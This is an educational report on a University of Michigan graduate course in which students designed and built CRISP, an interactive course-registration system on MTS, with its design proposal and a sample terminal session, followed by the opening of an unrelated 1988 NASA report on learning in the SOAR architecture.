In particular, in areas where the current system is ambiguous or unclear, assumptions were made during the course which might have been different if the Office of the Registrar had been consulted at the time. Fortunately, the final CRISP* system was *CRISP: Computerized Registration Involving Student Participation flexible enough to accommodate most of the changes they wanted to make. The charge to the class on the first day is included here as Appendix A. The interface to the present system was to be as follows: Tapes would be brought from DSC with the current student information file, the master catalog of courses, and the specific offerings for each term under consideration (up to five at any time). These would be used and maintained by CRISP in MTS, and subsequently, after students were assigned to courses and sections, tapes would be generated for further processing by DSC. The Class The organization of the course was essentially that described in [1]. The class was divided into groups, as suggested in Appendix A, although on the first day, the students proposed combining some of the suggested groups and reassigning some of the responsibilities. As a result, the following groups were formed: Group 1 - Data base initialization programs and batch output program specifications. Group 2 - Interactive program to accept input from terminal operator, check for syntactic validity, and call on group 3 routines to interact with data base. Generation of user's manual. Group 3 - Program to call up student record and appropriate course records and process commands as provided by group 2. Group 5 - Manipulation and maintenance of student and course data bases. Group 7 - Interrupt handling and post-processing cleanup of data bases via batch maintenance program. Group 8 - Project management and coordination. Each student was asked to specify his own choice of group, but he was requested to avoid any group for which he already had experience and expertise. (Here the educational goals of the course certainly conflicted with the production goals.) Then the expected problems of social organization began to appear, in terms of internal group leadership, a request for transfer of a dissident from one group to another group which considered itself large enough already, and communications interfaces between groups. The project management function was the responsibility of one of the groups. They tried several devices to facilitate intergroup communication, such as flow analysis, group progress reports, and written specifications for interfaces, and some of these were quite successful. Others, however, were abandoned as too time-consuming for the benefits. The professor attended all classes (and some extra-class group meetings), and offered advice, but remained largely as a monitor and "friend of the court," as well as a buffer to the rest of the university. In some cases, the students ignored this friendly advice - and learned from it. An example of this was the suggestion that in writing code, each group should use distinctive symbols suggestive of the group designation. They considered this unnecessary, but the subsequent confusion over multiply-defined symbols required a fair amount of extra effort. 
**Specification**

As seen in Appendix A, the system needed not only internal specification, but external specification as well.* Because of the need for compatibility with the current system, and credibility with those familiar with current procedures, it was quickly decided that terminal operators using CRISP would extract the information they needed for input from existing documents. But the interactive responses to the input, error diagnostics, and confirmation of results, as well as the necessary on-line file maintenance commands and interaction, had to be specified.

*Some minor features mentioned in Appendix A were eliminated by the class.

Our "participating observer" offered to produce a user's manual, which would represent the external specifications, and this offer was enthusiastically accepted by all. The class wisely counselled the group concerned with the interactive part of CRISP to organize that area into tabular constructs to facilitate changes. In fact, this was subsequently proven to be very wise, in the ability to add and modify many commands and access authorization codes relatively easily. It was largely in this area that it proved possible to accommodate the wishes of the Office of the Registrar after the course was over.

Implementation

One lesson the group learned was that the rather enjoyable period of arguing over specifications (both external and internal) must come to an end eventually, and hard decisions must replace wishful generalizations. Data structures must be determined, good estimates of expected volume of transactions must be obtained, and subroutine parameters must be agreed upon; and then a very tight rein must be kept on any further revisions. In this case, the specification phase probably lasted two or three weeks too long. It was clear to everyone that this was happening, but the feeling persisted that the specifications were not yet tight enough; that they had not really faced up to some of the real-world constraints that CRISP would have to live with. As time ran out, some design compromises were finally made, and coding began.

It became apparent that not very much time remained for coding and debugging, so a practice was initiated of having each group report its progress to the class at each meeting, in terms of percentage of expected code already written, and percentage thought to be debugged (admittedly difficult to determine!). This peer pressure for not delaying the group project was very effective, but integration of the various components produced by the several groups (and only partially debugged in many cases) did not start until the last week of the term. Here the debugging and other on-line facilities of MTS proved invaluable. During the last week of the course, the system was debugged enough to allow a demonstration two weeks later before a number of representatives of the administration. (Of course, only those parts of CRISP which could be relied upon were invoked during the on-line presentation, but the kind of typical activity shown in Appendix B was possible even then.) The debugging sessions were held at a terminal near the batch facility of the Computing Center, so large listings and other printouts could be generated very easily.
One feature of the MTS system which turned out to be particularly useful (besides the interactive symbolic debugging system and the system on-line editor) was the ability to suspend activity on one "logical telephone line" and request access to the MTS system via another "logical line," using the same physical line. On this second line one could sign on to MTS under another identification number* and modify or permit files to be accessed by the original task. This kind of flexibility is very useful when integrating many components developed in files belonging to different groups working under various identification numbers.

*More recently, under the same number as well.

Another development in the MTS system, which was anticipated during the course, but which was not actually available until four months later, was a revision in the MTS file management system to authorize a number of terminals to read and/or write a common set of files. Such a facility is clearly needed for an on-line reservation system, and with the external specifications already available during the course, the students were able to include multiple terminals in the design.

Subsequent Developments

As a result of the administrative demonstration, a small amount of money and some computer time were authorized to support a subset of the students during the following summer to continue the debugging of CRISP. A committee of representatives of the Office of the Registrar, the Counselling Office of the major undergraduate college, the CRISP class, DSC, the Scheduling Office, and students and faculty from other schools and colleges within the university, began to meet throughout the summer to plan a pilot run of CRISP, using real data. The CRISP group encouraged the use of actual student elections, but advocated a "dry run," so any problems which might develop would not jeopardize the credibility of the system with the campus community. The pilot run was carried out in September, using about 12% of the actual advanced classification student elections for the Fall term. There were a few small problems, but the results were very gratifying. At the time of writing, the committee is currently preparing a recommendation on the use of CRISP for the university.

One interesting question which still remains is whether to continue to use CRISP on the MTS system in conjunction with the DSC system, or to convert CRISP to run entirely on the DSC computer. In either case, there is the transitional problem of communicating what is known about CRISP and its internal structures to the staff of DSC for continued maintenance and development. With all of their good intentions, only a few students had the necessary time available for adequate documentation. It is clearly an integral part of system design, but the magnitude of the project forced this aspect to be less than satisfactory. Of course, system documentation was eventually generated, but the lesson was learned by all concerned.

Another lesson was involved with the ease with which the CRISP system could be moved entirely to the DSC computer system. Although this had been a goal from the start, and indeed the code had been made modular for this purpose, a number of system dependencies (i.e., implicit assumptions about the use of MTS) did creep in. For example, since each terminal runs an independent CRISP task on an independent copy of MTS (while sharing the actual re-entrant code of MTS), the CRISP system did not itself have to worry about interacting with more than one terminal.
This would require very different treatment in the IBM Operating System at DSC.

An interesting byproduct of the CRISP work was an interactive room scheduling and reservation system developed by one of the authors for use in the Scheduling Office. When the possibility was raised that the use of CRISP might indicate classes that would overflow assigned rooms, or that additional sections of a popular course would be needed, but academic departments might not be able to obtain new classrooms quickly enough, an interactive on-line reservation system was suggested. After a simple model was developed and implemented by Professor William Riddle with his beginning programming class during the summer, more realistic specifications were written, and the system was implemented and delivered to the Scheduling Office.

Conclusions

It is indeed possible to take on a realistic system with an advanced class, provided a good set of tools is available; in particular, a flexible general-purpose time-sharing system. Some prospect of eventual adoption of the results, if warranted, can provide a great deal of motivation. On the other hand, care must be taken to have continual guidance on the interface with the eventual environment in which the system will be used. The professor must himself be enthusiastic about the project—student criticisms of the course emphasized this point—but he must be sure to provide a careful balance between student management of the project and his "friendly advice." He must also provide enough initial specification to start the design process, but not so much as to stifle student initiative. The real challenge is to encourage the students in their natural enthusiasm and creativity, tempered with an appropriate sense of the real world.

Appendix A: Proposal for CCS 673 Project CRISP* - B. A. Galler

*Computerized Registration In Spite of Problems

1. General description - The problem is to develop a prototype (hopefully capable of expansion to a full system for the University of Michigan) for the student registration process, excluding payment of fees, etc. The general operation of the system will be as follows: A student will consult a printed Time Schedule as at present, including consultation with his counselor, and taking into account information on closed sections. He will present a completed course election form to one of several terminal operators, who will display any elections already confirmed for that student, and then key in his elections and request space in his selected courses. The system will confirm his elections if possible, and the student will receive written confirmation at a later time. After confirming a student's current elections, the program will request an optional list of preferences for the following term, taken from a list of courses to be offered. Students will be given an opportunity to indicate desired, but not listed, courses as well. Various kinds of queries will be allowed during the process, as well as changes to the Time Schedule information which forms the initial data base for the system.

2. Input - The initial data base will consist of a selected portion (capable of expansion) of the standard Time Schedule, together with coded information as to whether certain combinations must be elected together (such as lecture and lab), and whether certain courses are cross-listed (so enrollment quotas must be combined), etc. In addition, enrollment quotas and "early warning" levels should be entered, if appropriate.
(If possible, enrollment quotas should be maintained by major unit, school or college, by grad/undergrad, by class year, and by concentration. This may be considered a special case of a general need for special restrictions to be invoked for individual courses, except that it would be desirable to be able to get at the quotas dynamically to change them.) Provision should be made for a course to be designated as having a waiting list once any enrollment quota has been reached. (If the quota is later raised, places will be filled first from the waiting list according to order of arrival. Thus, if an instructor wishes to reserve to himself the option of selecting a subset of the people who wish to register for his course, he can specify a quota of zero, but request a waiting list.) 3. **Terminal Operation** - The system should support several kinds of terminals, including a display device (such as the CDC terminal), a teletype or typewriter device, and the touch-tone telephone ARU device. Selective responses should be available which are appropriate to the nature of the device. (Input should normally be echoed, with additional information added for verification purposes, such as course title and/or time at which class meets.) If the requested schedule cannot be confirmed, as many reasons should be given as possible, so as to minimize the number of return trips necessary to obtain an acceptable schedule. (An attempt to register for more than one course at the same hour should be flagged with a warning, but should not be treated as a "fatal error.") If a request for space in a closed course is made, it should be possible to request at the same time (or else be prompted) that the student's name be added to the waiting list. Provision should be made for periodic listing of closed courses for posting, and for interrogation by touch-tone telephone (and spoken response from the ARU) by any student as to the status of any course. The report of the status should give number enrolled and number of available spaces or length of the waiting list. (One might expect a few such telephones to be connected throughout the day for general student use.) Provision should also be made for dropping or adding individual courses by students who have already registered. One program (with restricted access) should be designated the "master program," and this should be (the only one) authorized to change every part of the Time Schedule data, including quotas. Courses or sections may be deleted here, with lists of those already registered for them available. Other programs will be allowed to change quotas for a specific department's courses. Included here is the ability to set or change "early warning" levels, for flagging potentially closed courses. Still other programs, for general use, should be able to query the status of various parts of the data base, such as the number enrolled under any quotas specified, the length of the waiting list, whether a particular section is closed, how many students have enrolled so far, how many today, a particular student's elections already confirmed, etc. 4. **Output** - The system should supply on demand a printed report of the current status of all (or a subset of) course enrollments, a closed-course list (including a separate list of changes - additions and deletions — since the last closed-course list appeared), a list of students enrolled in each course (with an additional list of names on the waiting list), and a schedule for each student showing his confirmed elections. 5. 
**Data Base Management** — The new file sharing features of MTS should be available in time for this course. Provision will have to be made for back-up and recovery in case of system crashes, as well as temporary lock-out on elections until they are confirmed or rejected (including delays due to prompting for waiting-list action).

6. **Documentation** — In addition to documentation of the internal organization of all components of the system, there should be a User's Guide which would include instructions for preparation of input data, instructions for operating a terminal, instructions to a student as to how to specify his desired elections and query for closed courses or the status of a particular course, and a list of possible diagnostics and the causes for their occurrence.

7. **Suggested Functional groups for class implementation of CRISP** —

<table> <thead> <tr> <th>Function</th> <th>Approximate Size of Group</th> </tr> </thead> <tbody> <tr> <td>1. Input Specifications, Initialization of data base, Specification of Storage Structures</td> <td>3</td> </tr> <tr> <td>2. Command Language Specifications and Interpreter</td> <td>3</td> </tr> <tr> <td>3. Terminal support and Query Programs</td> <td>2</td> </tr> <tr> <td>4. Special Course Restriction Routines, System Macros</td> <td>2</td> </tr> <tr> <td>5. Data base management, protection, interlocks</td> <td>3</td> </tr> <tr> <td>6. Generation of output</td> <td>2</td> </tr> <tr> <td>7. Restart, recovery, back-up</td> <td>2</td> </tr> </tbody> </table>

8. Specific Responsibilities of Functional Groups -

8.1 Input Specifications, Initialization of Data Base, etc. - This group will obtain input tape from Administrative Systems, modify it as necessary to include quota information, early warning levels, relationships between lectures and labs, etc., and indications of courses which require special "restriction subroutines." This group is also responsible for specification of the storage structures to be used and for routines for bringing this data into appropriate files. A similar responsibility exists for the list of courses for the following term(s) for preference tabulation. Routines should be provided for updating these tapes as necessary after acquisition from Administrative Systems.

8.2 Command Language Specifications and Interpreter - This group specifies the various commands for interrogating the data base, entering student elections, and modifying the data base. They will provide appropriate prompting routines, and an interpreter which will analyze commands and issue calls on various routines as necessary. (The called routines will be generated by other groups.)

8.3 **Terminal Support and Query Programs** - This group will determine the appropriate forms in which input/output is to occur on the various devices to be used. (Some prompting or display might be appropriate for one type of device and not another.) This group will also implement the routines which search the data base and which modify it. (These routines will call upon primitive routines provided by group 8.5.)

8.4 **Special Course Restriction Routines, System Macros** - This group will generate the special course "restriction subroutines" needed to enforce particular rules. (This is not the checking of prerequisites, which is not intended here.) These subroutines will be invoked during the attempt to confirm a student's elections. This group will also maintain the file of macros developed by the course activity.
8.5 **Data Base Management, Protection, Interlocks** - This group will provide the primitive routines used by the query and modification programs in searching and changing the data base. This group will provide appropriate checks for authorization, interlocking, obtaining and freeing space, etc. 8.6 **Generation of Output** - This group will provide routines for printed reporting of confirmed student elections, class lists, waiting lists, deleted course lists, closed course lists, etc. These routines will be invoked via the Command Language Interpreter. They will also generate a final status tape to return to Administrative Systems for later processing. 8.7 Restart, Recovery, Back-Up - This group will advise the others on appropriate code to be used to facilitate recovery and restart after system failures. Routines will be provided for back-up as necessary. Restart and recovery procedures will be specified and implemented. 8.8 System Integration, Maintenance of System Workbook, Project Coordination, Code Efficiency - This group will assume coordination responsibility, setting goals and monitoring them. Approval of changes to project specifications resides here, as well as monitoring individual groups' documentation and code efficiency. The system workbook will be maintained in one or more files by this group, and they will implement a skeleton system for use during system integration. 8.9 User's Guide, Test Environment, Interaction with Registrar's Office - This group will interact with and represent the user community for this system. They will lobby for whatever improvements are deemed desirable, and they will be aware of the user interface. They will generate a User's Guide suitable to instruct terminal operators and students to interact with the system and to interpret the output to be produced. They will create a test environment for the system. MODIFICATION 1 - Conditional Enrollment Threshold (CET) In the CRISP proposal, provision is made for "early warning" levels, which would initiate messages to departments when enrollment reached preset levels. We now replace the "early warning" concept with the Conditional Enrollment Threshold (CET), which will be set (and dynamically changed) by departments, just as quotas are set and changed. When the enrollment in a section has reached the CET level, requests for enrollment by students will be rejected unless a particular "counselor priority" indication is entered for that course. The operator will enter it only when a signed message is received from a counselor. If the enrollment in a section has in fact reached the section quota, "counselor priority" requests will be queued in the order of arrival at the head of the waiting list, so that such people will be the first admitted to a course if the quota is subsequently raised. The CET is intended to reserve places in sections for those whom counselors are willing to indicate as having special problems and who need special priority. A department may set the CET to zero, requiring special permission for everyone, or they may set the CET equal to the quota for a section (the default case), in which case no counselor priority would be needed for anyone. The response to an interrogation about enrollment in a course should indicate whether the CET has been reached. If there is a waiting list, the length of the CET portion and the length of the non-CET portion would be reported, also. 
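The CET rule above is compact but easy to misread, so here is a small Python sketch of the decision logic for a single enrollment request. It is purely illustrative: the original CRISP ran on MTS, and the names `Section` and `request_enrollment` and every detail below are invented for this sketch rather than taken from the proposal.

```python
from collections import deque
from dataclasses import dataclass, field

@dataclass
class Section:
    quota: int                                   # maximum enrollment
    cet: int                                     # Conditional Enrollment Threshold
    enrolled: int = 0
    wait_priority: deque = field(default_factory=deque)  # counselor-priority requests (head of list)
    wait_regular: deque = field(default_factory=deque)   # ordinary waiting-list entries

def request_enrollment(sec, student, counselor_priority=False, join_waiting_list=False):
    """Decide one enrollment request under the CET rule sketched in MODIFICATION 1."""
    if sec.enrolled < min(sec.cet, sec.quota):
        sec.enrolled += 1
        return "CONFIRMED"
    if counselor_priority:
        if sec.enrolled < sec.quota:             # between CET and quota: priority requests get in
            sec.enrolled += 1
            return "CONFIRMED"
        sec.wait_priority.append(student)        # quota reached: queue ahead of regular entries
        return "WAITING LIST (PRIORITY)"
    if join_waiting_list:                        # student asked (or was prompted) to wait
        sec.wait_regular.append(student)
        return "WAITING LIST"
    return "REJECTED: CET REACHED"
```

Setting `cet` to zero forces counselor priority for everyone, while setting it equal to `quota` (the default case described above) makes the threshold invisible, which matches the two limiting cases in the proposal.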
MODIFICATION 2 - Piecewise Registration It is quite possible that registration procedures will be spread over several weeks, and that different groups of students will be registered in different time periods, such as by alphabetical groupings. In this case, it would be desirable to increase the enrollment quotas whenever a new time period began, without necessarily admitting those on the waiting list from the preceding time periods. The program which allows departments to change quotas, therefore, should allow for modification of quotas without the automatic entry into the course of people from the waiting list. Appendix B - CRISP Output YOU ARE NOW CONVERSING WITH CRISP *id 2145273192 214-52-7319-2 WIRE BARBARA 77 L 10:04.10 01-29-73 *ELECTIONS FOR FALL * *el *ELECTIONS FOR FALL * 1 353 C C S 473 3 001 2 353 C C S 673 3 001 TOTAL CREDIT HOURS FALL 6 *id 1234567899 ** NO RECORD: 123-45-6789-9 *insert 1234567899 name=wilson pickett fence unit=1 year=68 INSERT 123-45-6789-9 WILSON PICKETT FENCE 68 L ?ok DONE 10:05.43 *st 353 673 001 FALL 353 C C S 673 SYSTEMS PROGRAMMING SEC LIMITS ENROLLED AVAILABLE WAITING 001 MAX 21 CET 10 TOT 1 REG 9 PRI 11 REG 0 PRI 0 *id 1234567899 123-45-6789-9 WILSON PICKETT FENCE 68 L 10:07.31 01-29-73 *NO ELECTIONS FOR FALL * *ad 353 673 3 001 *ad 428 555 3 001 *ad 428 684 3 001 *hr 9 ECHO: 1 ADD 353 C C S 673 3 001 2 ADD 428 MATH 555 3 001 3 ADD 428 MATH 684 3 001 TOTAL CREDIT HOURS FALL 9 *update FALL ELECTIONS CONFIRMED FOR 9 HOURS CREDIT 10:08.51 *ELECTIONS FOR FALL * 1 353 C C S 673 3 001 2 428 MATH 555 3 001 3 428 MATH 684 3 001 TOTAL CREDIT HOURS FALL 9 D:0 A:3 W:0 N1:1 N2:0 K280 KEEP THIS, IT'S NOT LITTER *id 2145273192 214-52-7319-2 WIRE BARBARA 77 L 10:09.39 01-29-73 *ELECTIONS FOR FALL * *DROP 353 473 3 001 *AD 428 555 3 002 *HR 3 ECHO: 1 DROP 353 C C S 473 3 001 2 ADD 428 MATH 555 3 002 TOTAL CREDIT HOURS FALL 3 FALL ELECTIONS CONFIRMED FOR 6 HOURS CREDIT 10:11.02 ** CHECK HOURS! ENTERED: 3 CONFIRMED: 6 *ELECTIONS FOR FALL * 1 353 C C S 673 3 001 2 428 MATH 555 3 002 TOTAL CREDIT HOURS FALL 6 D:1 A:4 W:0 N2:1 K28D GUARD THIS WITH YOUR LIFE (IT IS YOUR LIFE) <table> <thead> <tr> <th>Course Code</th> <th>Course Title</th> <th>Section Code</th> <th>Enrollment</th> <th>Available</th> <th>Waiting</th> <th>HRS</th> </tr> </thead> <tbody> <tr> <td>353 673 001</td> <td>FALL 353 C C S</td> <td>001</td> <td>3</td> <td>0</td> <td>0</td> <td>15</td> </tr> <tr> <td></td> <td>673 SYSTEMS PROGRAMMING</td> <td></td> <td>REG 8</td> <td>PRI 11</td> <td></td> <td>3 TTHS 8PM</td> </tr> <tr> <td></td> <td></td> <td></td> <td>CET 10</td> <td>TOT 2</td> <td>REG 0</td> <td>2086 F B</td> </tr> <tr> <td>428 555 000-999</td> <td>FALL 428 MATH</td> <td>001</td> <td>3</td> <td>0</td> <td>0</td> <td>40</td> </tr> <tr> <td></td> <td>555 COMPLEX VARIABLES</td> <td></td> <td>REG 10</td> <td>PRI 30</td> <td></td> <td>1-3 MWF 10</td> </tr> <tr> <td></td> <td></td> <td></td> <td>CET 10</td> <td>TOT 1</td> <td>REG 0</td> <td>433 P A</td> </tr> </tbody> </table> *Invalid section number: 3 ** ALREADY ON FILE - 214-52-7319-2 WIRE BARBARA ** THE FOLLOWING COMMANDS WILL BE ACCEPTED: ID TE IN CH RE ST DI LC AC CC SE DC CA XC HE CO MT SY SI *EXECUTION TERMINATED References
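The Appendix B transcript shows the command style that group 8.2's interpreter had to support (*id, *ad, *el, and so on). Purely as a hypothetical sketch of that dispatch structure, and not as a description of the actual MTS implementation, such an interpreter might be organized like this; all handler behavior here is a toy stub.

```python
# Hypothetical sketch of a CRISP-style command dispatcher (cf. section 8.2).
# Command names mirror the Appendix B transcript; the handlers are toy stubs.

def cmd_id(session, args):
    """*id <student number>: select a student and show any confirmed elections."""
    session["student"] = args[0] if args else None
    return f"STUDENT {session['student']}"

def cmd_ad(session, args):
    """*ad <dept> <course> <hours> <section>: add an election for the current student."""
    session.setdefault("elections", []).append(args)
    return "ECHO: ADD " + " ".join(args)

def cmd_el(session, args):
    """*el: list the elections entered so far."""
    return "\n".join(" ".join(e) for e in session.get("elections", [])) or "*NO ELECTIONS*"

HANDLERS = {"id": cmd_id, "ad": cmd_ad, "el": cmd_el}

def interpret(session, line):
    """Analyze one '*'-prefixed command and call the matching routine."""
    parts = line.lstrip("*").split()
    if not line.startswith("*") or not parts:
        return "** UNRECOGNIZED INPUT"
    handler = HANDLERS.get(parts[0].lower())
    if handler is None:
        return "** THE FOLLOWING COMMANDS WILL BE ACCEPTED: " + " ".join(sorted(h.upper() for h in HANDLERS))
    return handler(session, parts[1:])
```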
{"Source-Url": "https://files.eric.ed.gov/fulltext/ED084839.pdf", "len_cl100k_base": 7244, "olmocr-version": "0.1.50", "pdf-total-pages": 28, "total-fallback-pages": 0, "total-input-tokens": 50565, "total-output-tokens": 8451, "length": "2e12", "weborganizer": {"__label__adult": 0.0007581710815429688, "__label__art_design": 0.0011835098266601562, "__label__crime_law": 0.0005235671997070312, "__label__education_jobs": 0.362548828125, "__label__entertainment": 0.0002579689025878906, "__label__fashion_beauty": 0.0003864765167236328, "__label__finance_business": 0.0012807846069335938, "__label__food_dining": 0.00093841552734375, "__label__games": 0.0013971328735351562, "__label__hardware": 0.00304412841796875, "__label__health": 0.0015039443969726562, "__label__history": 0.001377105712890625, "__label__home_hobbies": 0.0004191398620605469, "__label__industrial": 0.0010318756103515625, "__label__literature": 0.0013341903686523438, "__label__politics": 0.0004763603210449219, "__label__religion": 0.0012836456298828125, "__label__science_tech": 0.060211181640625, "__label__social_life": 0.0006890296936035156, "__label__software": 0.031005859375, "__label__software_dev": 0.525390625, "__label__sports_fitness": 0.000469207763671875, "__label__transportation": 0.0020084381103515625, "__label__travel": 0.0006036758422851562}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 34596, 0.10392]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 34596, 0.20378]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 34596, 0.94978]], "google_gemma-3-12b-it_contains_pii": [[0, 1274, false], [1274, 1471, null], [1471, 2315, null], [2315, 3717, null], [3717, 5415, null], [5415, 7059, null], [7059, 8581, null], [8581, 10288, null], [10288, 11927, null], [11927, 13636, null], [13636, 15168, null], [15168, 16895, null], [16895, 18466, null], [18466, 18587, null], [18587, 20166, null], [20166, 21907, null], [21907, 23647, null], [23647, 25606, null], [25606, 26778, null], [26778, 28271, null], [28271, 29808, null], [29808, 31411, null], [31411, 31675, null], [31675, 31701, null], [31701, 32730, null], [32730, 33203, null], [33203, 34244, null], [34244, 34596, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1274, true], [1274, 1471, null], [1471, 2315, null], [2315, 3717, null], [3717, 5415, null], [5415, 7059, null], [7059, 8581, null], [8581, 10288, null], [10288, 11927, null], [11927, 13636, null], [13636, 15168, null], [15168, 16895, null], [16895, 18466, null], [18466, 18587, null], [18587, 20166, null], [20166, 21907, null], [21907, 23647, null], [23647, 25606, null], [25606, 26778, null], [26778, 28271, null], [28271, 29808, null], [29808, 31411, null], [31411, 31675, null], [31675, 31701, null], [31701, 32730, null], [32730, 33203, null], [33203, 34244, null], [34244, 34596, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, 
false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 34596, null]], "pdf_page_numbers": [[0, 1274, 1], [1274, 1471, 2], [1471, 2315, 3], [2315, 3717, 4], [3717, 5415, 5], [5415, 7059, 6], [7059, 8581, 7], [8581, 10288, 8], [10288, 11927, 9], [11927, 13636, 10], [13636, 15168, 11], [15168, 16895, 12], [16895, 18466, 13], [18466, 18587, 14], [18587, 20166, 15], [20166, 21907, 16], [21907, 23647, 17], [23647, 25606, 18], [25606, 26778, 19], [26778, 28271, 20], [28271, 29808, 21], [29808, 31411, 22], [31411, 31675, 23], [31675, 31701, 24], [31701, 32730, 25], [32730, 33203, 26], [33203, 34244, 27], [34244, 34596, 28]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 34596, 0.07921]]}
PRODUCTION SYSTEM CHUNKING IN SOAR: CASE STUDIES IN AUTOMATED LEARNING

Final Report NASA/ASEE Summer Faculty Fellowship Program -- 1988 Johnson Space Center

Prepared By: Robert Allen, Ph.D. Academic Rank: Assistant Professor University & Department: University of Houston Dept. of Mechanical Engineering Houston, TX 77204-4792 NASA/JSC Directorate: Mission Support Division: Mission Planning and Analysis Branch: Technology Development and Applications JSC Colleague: Robert T. Savely Date Submitted: 27 July 1988 Contract Number: NGT 44-005-803

ABSTRACT

A preliminary study of SOAR, a general intelligent architecture for automated problem solving and learning, is presented. The underlying principles of universal subgoaling and chunking were applied to a simple, yet representative, problem in artificial intelligence. A number of problem space representations were examined and compared. It is concluded that learning is an inherent and beneficial aspect of problem solving. Additional studies are suggested in domains relevant to mission planning, as well as in aspects related to SOAR itself.

INTRODUCTION

SOAR is a production system architecture for a system capable of exhibiting general intelligence. SOAR has three principal characteristics separating it from other architectures. These are: (1) SOAR can be used to solve a range of problems, from routine problems to open-ended problems; (2) SOAR applies a wide range of problem-solving methods required for these tasks; and (3) SOAR learns about aspects of the problem-solving process and is capable of reporting about its performance. This document summarizes the work performed in implementing simple, yet representative, problems in SOAR. One purpose of this exercise was to become acquainted with the SOAR architecture and implementation. In the course of this work, some general issues were raised and found to coincide with current research topics in SOAR. This paper is organized as follows. First, a brief description of SOAR is presented. Next, some "toy" AI problems are briefly described and their implementations in SOAR are presented. Penultimately, a comparison of some problem decompositions is examined and the effect of problem presentation on learning and performance is discussed. Finally, future studies that can be performed are recommended.

SOAR: AN OVERVIEW

SOAR is an architecture for exhibiting general intelligent behavior. SOAR has evolved from a series of production system architectures (1,2). SOAR is embedded in about 255 kilobytes of LISP code, and extends 100 kilobytes of modified OPS5 code. In SOAR, each task is represented in problem-spaces. The problem solving process begins from an initial state, working through the state to subsequent states by applying operators. Stages in the problem solving process are characterized by a goal context, which consists of the current goal, problem-space, state and operator. When one stage in the problem-solving process does not have enough information, it creates a subgoal (hence the name "universal subgoaling") to collect the needed information. The new subgoal is then added to the goal stack that keeps track of the goals that were created for this problem-space. When the needed information is available, the subgoal terminates and pops from the goal stack. The goal stack also serves as the anchor to information in working memory (WM). Each working memory element (WME) is connected to some goal in the stack and can be accessed only by specifying the connection from the goal to the WME via **augmentations**. An example of one such connection is: \[ \begin{align*} (\text{goal } <g> \ ^\text{state} <s>) \\ (\text{state } <s> \ ^\text{binding} <b>) \\ (\text{binding } <b> \ ^\text{cell c11} \ ^\text{tile t1}) \end{align*} \] where **state** and **binding** are the goal augmentations that provide the connection between the goal <g> and the value of the action attribute. A **chunking mechanism** is provided to summarize the system behavior in terms of subgoals, and also enables the system to learn aspects of problem solving related to subgoals. The overall architecture is presented in Figure 1. Some of the important characteristics of SOAR are: (1) separation between the architecture level and the knowledge level; (2) problem-spaces for representing knowledge; (3) universal subgoaling to resolve impasses; and (4) a production system representation that serves as access paths to information in long term memory. In addition, there is no conflict resolution mechanism in SOAR. All matched productions are fired "in parallel" and add one type of WME to the working memory. The process of collecting available information is called the **elaboration phase**. The second type of WME is the **preference element** that is used by the architecture in the **decision cycle** to determine the next goal context. The decision procedure, sketched in Figure 2, controls the elaboration and decision cycles. More detailed descriptions can be found elsewhere (1-3).

[Figure 1: the Soar architecture. Figure 2: the decision procedure - an elaboration phase runs to quiescence, preferences are gathered and interpreted, and the decision either replaces a context object (state, goal, problem-space or operator) or, on an impasse, creates a subgoal; there is no conflict resolution except refractory inhibition.]

**PROBLEM DOMAIN**

SOAR's capabilities are illustrated below in an output trace of the problem-solving process for the "eight-puzzle" problem. The board in the eight-puzzle is represented by nine cells occupied by tiles numbered one through eight, with one blank cell. The numbers at the beginning of each line are the decision cycle numbers; elaboration cycles are not shown. The **Build**:P notation signifies a new chunk (rule) being created during the trace. The letters G, P, O and S represent the current goal, problem-space, operator and state, respectively.
